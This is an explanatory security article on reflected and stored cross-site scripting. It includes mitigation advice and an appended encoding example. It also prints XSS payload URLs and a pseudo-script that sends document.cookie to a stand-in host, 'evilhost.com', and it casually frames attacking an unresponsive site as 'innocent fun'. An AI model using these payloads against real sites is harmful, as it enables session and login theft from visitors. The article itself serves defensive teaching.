XSS Vulnerabilities, So underestimated, so dangerous
By Zinho



In this little paper I will try to convince admins, webmasters and in general everyone concerned with securing a web site of how dangerous an XSS hole can be. I will not cover in depth what XSS is, because there's a huge library on this topic available on the internet and on www.hackerscenter.com/library

--[ 2.0 XSS

So what's XSS? XSS stands for cross site scripting, that is, a way to inject script code into a web page, making it execute whenever the page loads or a specific event is triggered.

2.1 Temporary XSS

One factor because of which this kind of bug is underestimated is what I usually call "temporary XSS". A temporary XSS is script code executed only when the user issues a crafted input that contains that script code.

Example: http://vuln.host.com/search.asp?q=<plaintext>

The above example will inject a "<plaintext>" tag into the search.asp page, showing the HTML source code of the page. The point here is: whoever searched for <plaintext> will see the source code, but this does not imply any permanent alteration of the page.

2.2 Permanent XSS

A "permanent XSS", as I usually call them, is due to unsanitized user input that is saved, for example, in a database. Each time these unsanitized fields are read from the database and printed on the page, the script is executed. (A lot of server-side registration form scripts are affected by this kind of vuln.)

--[ 3.0 Attacks

What I want to demonstrate in this article is how dangerous a temporary XSS can be. Most webmasters (99%, believe me) treat this kind of bug as a very, very low-level issue because of the reasons we have seen. They think it is even a waste of time to sanitize input that doesn't go into a database.

What they seem unable to understand is that whenever a malicious user is able to run a client-side script from their domain name, a cookie-stealing attack can *easily* be carried out. This becomes a high-risk vuln when we deal with e-commerce sites, webmail services and similar.

3.1 Scenario 1

Let's assume that we've found an XSS vuln in 2 sites. The first will be used as the "dumb" site (A), which has a permanent XSS hole, while the latter is a big shopping portal (B) I want to steal cookies from, which has "just" a little innocent temporary XSS hole.

We mail the big shopping portal admin about the vuln, trying to make him understand how serious the bug is. He never replies. So we decide to have some fun...innocent fun...as innocent as their XSS hole was, I suppose...

What one could do is inject a stealth script into the dumb site to force (always stealthily) every visitor of site A to load the vulnerable URL we have found on site B. Here anyone can understand that even http://vuln.host.com/search.asp?q=<plaintext> is now very, very useful for our purpose. Instead of <plaintext>, we can use something like this: http://vuln.host.com/search.asp?q=<script src='http://myhosting.com/xsstrials/funny.js'></script>

Funny.js will be our malicious script code that will run on the vuln.host.com domain ...and it will be similar to this:

// Funny.js
navigate to 'evilhost.com/collect_cookies.asp?cookie=' + document.cookie
// where collect_cookies.asp will be a server-side script that collects everything passed in the "cookie" parameter, and evilhost.com can be a hosting space set up by the malicious attacker.

So what happens here?
1. A user visits the dumb site, thus triggering our permanent XSS.
2. The permanent XSS loads the page http://vuln.host.com/search.asp?q=<script src='http://myhosting.com/xsstrials/funny.js'></script>, which executes funny.js thanks to the temporary XSS hole in the big shopping portal.
3. funny.js is now loaded on the big shopping portal's domain name, letting us steal the cookie (and the login data) of the dumb site visitor.

By "stealth script" we mean a script that doesn't change the appearance of the page, so that no one will notice any background work.

--[ Side effects

In this section I will show some side effects of the XSS disease that are often forgotten or misunderstood by a lot of analysts/webmasters.

XSS holes, permanent and temporary ones, can be used to attack a local victim (a visitor of the vulnerable site) directly, by injecting malicious code capable of exploiting a local vulnerability in the victim's system. This has become very common (and easy to do) because of the tons of vulnerabilities that affect Internet Explorer and browsers in general.

Let's take for example an XSS hole in trustedsite.com. Anyone could take advantage of the trust placed in this domain to execute code with high privilege levels, executing or installing malicious ActiveX controls. This kind of approach can be taken in Internet Explorer and in general in all the browsers that use the so-called trusted "Zones".

Another important issue that can make a simple XSS hole a high-risk issue is the capability of attacking thousands of computers in a few hours or even minutes, according to the traffic of the vulnerable page. This kind of practice can lead to malware/adware spread. If a high-traffic page is vulnerable to a permanent XSS, a malware/worm/adware coder can choose this kind of approach to plant the seeds of his worm, making it spread in a stealthy manner and in a short time.

--[ How to solve the problem

Incredible to say, XSS holes are the simplest to solve and fix. They usually involve the script tag, but not always. Less known code can use the image tag with the dynsrc or src parameters and "javascript:alert('aaa')" as argument, or the <style> tag, e.g.: <style type="text/javascript">script goes here</style>

In general the characters to be sanitized are the usual "<" and ">", but there are some more to be carefully escaped: &{code}; will run the code in Netscape / Mozilla browsers, so the "&{" combination of chars should be sanitized too. In 99% of the cases an "HTML Encode" would solve the problem. In ASP it can easily be done with the built-in function server.htmlencode(myparameter).
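The fix from this section as an added example that is not the paper's code: the vulnerable search page rendering next to the HTML-encoded one, written in Node.js rather than classic ASP, with htmlEncode standing in for server.htmlencode. The payloads in SAMPLES are constructed from the ones discussed above, and the tag-count check is an assumption of this example, not something the paper describes.

```javascript
// Added example (not the paper's code): the search.asp case above, in Node.js.

// HTML-encode the characters that let a parameter change the page structure.
// This is what ASP's server.htmlencode does; encoding "&" also defuses the
// Netscape/Mozilla "&{code};" form the paper mentions.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the "q" parameter is pasted into the page unchanged.
function renderRaw(q) {
  return `<p>Results for: ${q}</p>`;
}

// Fixed: the parameter is encoded, so the browser renders it as text.
function renderSafe(q) {
  return `<p>Results for: ${htmlEncode(q)}</p>`;
}

// Count HTML tags in a fragment. The template itself contributes exactly two
// (<p> and </p>), so anything above two came from the parameter.
function tagCount(html) {
  return (html.match(/<\/?[a-z][^>]*>/gi) || []).length;
}

// Constructed payloads matching the ones discussed in the paper.
const SAMPLES = [
  '<plaintext>',
  "<script src='http://myhosting.com/xsstrials/funny.js'></script>",
  '&{alert(1)};',
];

// For each sample, report whether the raw and the encoded page still carry
// injected markup: extra tags, or a live "&{" sequence.
function compare(samples = SAMPLES) {
  return samples.map((q) => {
    const raw = renderRaw(q);
    const safe = renderSafe(q);
    return {
      q,
      rawInjected: tagCount(raw) > 2 || raw.includes('&{'),
      safeInjected: tagCount(safe) > 2 || safe.includes('&{'),
    };
  });
}
```

The check covers the HTML text context used by search.asp; a parameter placed inside an attribute such as the img src/dynsrc case needs the attribute quoted as well, which the encoding of quotes above supports.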